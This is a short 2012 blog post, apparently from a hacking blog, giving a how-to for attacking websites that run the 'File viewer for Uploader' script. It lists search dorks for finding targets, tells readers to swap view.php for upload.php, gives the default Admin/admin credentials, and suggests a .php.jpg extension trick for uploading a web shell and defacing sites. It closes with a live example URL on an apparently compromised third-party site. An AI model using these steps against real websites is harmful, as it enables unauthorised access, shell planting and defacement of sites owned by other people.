Saturday, October 20, 2012
File viewer exploit | remote file upload vulnerability
Do you like this story?
"file viewer" is just another remote file upload vulnerability, it allows you to upload .html .txt and .jpg files, for shell uploading try .php.jpg or php shell uploading with extention changing |
Tamper data or Live Http headers
Dorks: "file viewer for uploader"
or
"File viewer for Uploader (c) 2003 by Dirk Paehl"
after clicking on site you'll get site url like this :
http://www.site.com/view.php
or
http://www.site.com/directory/view.php
now replace view.php with upload.php
http://www.site.com/upload.php
and you'll get upload options there !!!
in some sites it will ask for Name and Password
default password for these websites is Admin
Name = Admin
Password= admin (in small letters)
upload shell,deface,image etc...
LIVE EXAMPLE:
http://www.ldcc.net.au/uploaden/-=U.H-=.html
